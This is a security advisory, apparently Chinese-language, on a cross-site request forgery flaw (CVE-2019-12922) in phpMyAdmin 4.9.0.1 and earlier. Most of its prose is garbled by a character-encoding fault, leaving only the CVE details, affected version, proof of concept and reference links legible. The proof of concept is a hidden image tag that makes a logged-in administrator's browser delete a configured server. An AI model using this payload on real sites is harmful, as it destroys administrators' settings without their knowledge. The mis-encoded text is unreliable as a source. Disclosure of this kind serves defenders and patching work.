phpMyAdmin¿çÕ¾ÇëÇóαÔìÎó²îÇ徲ͨ¸æ

Ðû²¼Ê±¼ä 2019-09-23

¡ñÎó²î±àºÅºÍ¼¶±ð


CVE±àºÅ£ºCVE-2019-12922£¬Î£ÏÕ¼¶±ð£ºÖÐΣ£¬CVSS·ÖÖµ£º6.5


¡ñÓ°Ïì°æ±¾


phpMyAdmin<= 4.9.0.1


¡ñÎó²î¸ÅÊö


phpMyAdminÊÇÒ»¸öMySQLºÍMariaDBÊý¾Ý¿âµÄÃâ·Ñ¿ªÔ´ÖÎÀí¹¤¾ß£¬ÆÕ±éÓÃÓÚÖÎÀíWordPress¡¢JoomlaºÍÐí¶àÆäËûÄÚÈÝÖÎÀíÆ½Ì¨½¨ÉèµÄÍøÕ¾µÄÊý¾Ý¿â¡£


¿ËÈÕ£¬Çå¾²Ñо¿Ö°Ô±Manuel Garcia CardenasÅû¶ÁËphpMyAdminµÄÒ»¸ö¿çÕ¾ÇëÇóαÔ죨CVE-2019-12922£©Îó²î¡£¹¥»÷Õß¿ÉʹÓøÃÎó²îÓÕʹÈÏÖ¤Óû§Ö´ÐжñÒâ²Ù×÷¡£µ±¹¥»÷Õß½«¶ñÒâ½á¹¹µÄURL·¢Ë͸øÄ¿µÄwebÖÎÀíԱʱ£¬Èô¸ÃwebÖÎÀíÔ±ÒÑʹÓÃͳһä¯ÀÀÆ÷Éϰ¶ÁËphpmyAdminÃæ°å£¬²¢·­¿ª¸ÃÁ´½Ó£¬¼´¿ÉÖ´ÐÐURL°üÀ¨µÄ¶ñÒâÇëÇóɾ³ýÄ¿µÄ·þÎñÆ÷ÉÏphpMyAdminÃæ°åÉèÖÃÒ³ÃæÖÐËùÉèÖõķþÎñÆ÷¡£


¡ñÎó²îÑéÖ¤


POC:ʹÓà CSRF ¡ªÉ¾³ýÖ÷·þÎñÆ÷¡£


<p>Deleting Server 1</p>

<img src="

http://server/phpmyadmin/setup/index.php?page=servers&mode=remove&id=1";

style="display:none;" />


¡ñÐÞ¸´½¨Òé


¹Ù·½ÔÝδÐû²¼Õë¶Ô´ËÎó²îµÄÐÞ¸´°æ±¾¡£


ÔÝʱ»º½â²½·¥£º


Óû§¿Éͨ¹ýÔÚÿ´ÎŲÓÃʱʹÓÃtoken±äÁ¿ÑéÖ¤À´¶Ô¸ÃÎó²î¾ÙÐзÀ»¤¡£


ÔÚά»¤Ö°Ô±¶Ô¸ÃÎó²î¾ÙÐÐÐÞ¸´Ç°£¬Ç¿ÁÒ½¨ÒéÏà¹ØµÄÓû§×èÖ¹µã»÷ÈκοÉÒɵÄÁ´½ÓÔì³ÉΣº¦£¬Çë¹Ø×¢¹Ù·½Ïà¹ØÐÂÎÅ£¬ÒÔ±ãʵʱÉý¼¶phpMyAdminÖÁÐÞ¸´°æÔ­À´·À»¤´ËÎó²î¡£


¡ñ²Î¿¼Á´½Ó


https://thehackernews.com/2019/09/phpmyadmin-csrf-exploit.html

https://seclists.org/fulldisclosure/2019/Sep/23